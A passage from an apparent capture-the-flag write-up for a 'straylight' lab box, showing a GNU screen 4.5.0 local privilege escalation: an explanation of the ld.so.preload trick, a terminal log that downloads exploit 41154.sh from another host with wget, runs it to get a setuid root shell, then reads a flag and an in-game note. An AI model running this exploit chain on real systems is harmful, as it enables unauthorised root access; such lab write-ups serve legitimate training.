echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Get root

Why this works: screen 4.5.0 opens the logfile named by -L with root privileges before it checks it, so `screen -D -m -L ld.so.preload` creates a root-owned /etc/ld.so.preload containing /tmp/libhax.so. Every program started afterwards loads that library, including the setuid screen run by `screen -ls`; its constructor then runs as root, chowns /tmp/rootshell to root, makes it setuid and unlinks the preload file. The "cannot be preloaded" line is the loader complaining about the leading newline entry and is harmless. Clean-up note: the exploit removes /etc/ld.so.preload but leaves /tmp/libhax.so and a setuid-root /tmp/rootshell behind; remove them when done.
www-data@straylight:/tmp$ wget http://192.168.9.39/41154.sh
wget http://192.168.9.39/41154.sh
--2023-12-19 23:35:37--  http://192.168.9.39/41154.sh
Connecting to 192.168.9.39:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [text/x-sh]
Saving to: '41154.sh'

41154.sh            100%[===================>]   1.12K  --.-KB/s    in 0s

2023-12-19 23:35:37 (200 MB/s) - '41154.sh' saved [1149/1149]

www-data@straylight:/tmp$ ls
ls
41154.sh  screens
www-data@straylight:/tmp$ chmod +x 41154.sh
chmod +x 41154.sh
www-data@straylight:/tmp$ ls
ls
41154.sh  screens
www-data@straylight:/tmp$ ./41154.sh
./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function 'dropshell':
/tmp/libhax.c:7:5: warning: implicit declaration of function 'chmod' [-Wimplicit-function-declaration]
     chmod("/tmp/rootshell", 04755);
     ^~~~~
/tmp/rootshell.c: In function 'main':
/tmp/rootshell.c:3:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
     setuid(0);
     ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function 'setgid' [-Wimplicit-function-declaration]
     setgid(0);
     ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function 'seteuid' [-Wimplicit-function-declaration]
     seteuid(0);
     ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function 'setegid' [-Wimplicit-function-declaration]
     setegid(0);
     ^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function 'execvp' [-Wimplicit-function-declaration]
     execvp("/bin/sh", NULL, NULL);
     ^~~~~~
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Get the flag
root@straylight:/root# cat flag.txt
cat flag.txt
5ed185fd75a8d6a7056c96a436c6d8aa


Get the hint
root@straylight:/root# cat note.txt
cat note.txt
Devs,

Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.

The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.

Anyways, we've deployed the war file on tomcat as ordered - located here:

/struts2_2.3.15.1-showcase

It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.

Regards,

Bob Laugh
Turing Systems Engineer II
Freeside//Straylight//Ops5
root@straylight:/root#




Lateral movement

The target box was not set up properly... will update later.
